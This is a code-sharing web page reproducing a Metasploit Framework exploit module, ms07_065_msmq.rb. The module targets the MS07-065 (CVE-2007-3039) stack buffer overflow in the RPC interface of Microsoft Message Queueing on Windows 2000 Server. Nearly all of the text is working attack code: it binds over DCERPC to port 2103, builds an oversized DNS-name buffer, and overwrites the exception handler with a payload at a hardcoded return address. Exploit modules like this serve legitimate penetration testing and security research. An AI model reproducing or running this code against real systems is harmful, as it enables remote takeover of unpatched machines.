扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 |
## # $Id: ms07_065_msmq.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Message Queueing Service DNS Name Path Overflow', 'Description'=> %q{ This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. This name does not need to be served by a valid DNS server, only configured on the target machine. }, 'Author' => [ 'hdm' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9929 $', 'References' => [ [ 'CVE', '2007-3039'], [ 'OSVDB', '39123'], [ 'MSB', 'MS07-065'], ], 'Privileged' => true, 'Payload'=> { 'Space'=> 1024, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff", 'StackAdjustment' => -3500, }, 'Targets'=> [ [ 'Windows 2000 Server English', { 'Platform' => 'win', 'Ret'=> 0x75022ac4 # ws2help - pop/pop/ret }, ], ], 'DisclosureDate' => 'Dec 11 2007', 'DefaultTarget' => 0)) # Change the default port values to point at MSMQ register_options( [ Opt::RPORT(2103), OptString.new('DNAME',[ true,"The DNS hostname of the target" ]), ], self.class) end def autofilter # Common vulnerability scanning tools report port 445/139 # due to how they test for the vulnerability. Remap this # back to 2103 for automated exploitation rport = datastore['RPORT'].to_i if ( rport == 445 or rport == 139 ) datastore['RPORT'] = 2103 end # The fqdn is required to exploit this bug if (not datastore['DNAME']) # XXX automatically determine the hostname return false end true end def exploit connect print_status("Trying target #{target.name}...") handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") dname = datastore['DNAME'] boom = rand_text_alphanumeric(4096) hname,domain = dname.split(".") if(not domain) print_status("The DNAME parameter specified is not valid.") print_status("This option must be the fully-qualified domain name of the target (as it has been configured).") return end off = 310 - (hname.length * 2) seh = generate_seh_payload(target.ret) boom[off, seh.length] = seh buff= Rex::Text.to_unicode("#{dname}\\") buff << boom buff << "\x00\x00" # Data alignment while(buff.length % 4 != 0) buff << "\x00" end stubdata = NDR.long(1) + # [in] long arg_1, NDR.UnicodeConformantVaryingStringPreBuilt(buff) +# [in][string] wchar_t * arg_2, NDR.long(0) * 5 # ... fields we can ignore print_status('Sending exploit...') begin response = dcerpc.call(6, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) case dcerpc.last_response.stub_data when "\x14\x00\x0e\xc0" print_error("Error: The wrong value has been supplied for the DNAME parameter") print_error("This value must be the fully-qualified domain name of the target") print_error("Many systems have no FQDN configured and cannot be exploited") else print_status("An unknown response was received from the server:") print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0]) end end rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status("No response from the DCERPC service (this is usually a good thing).") end handler disconnect end end |
体验盒子
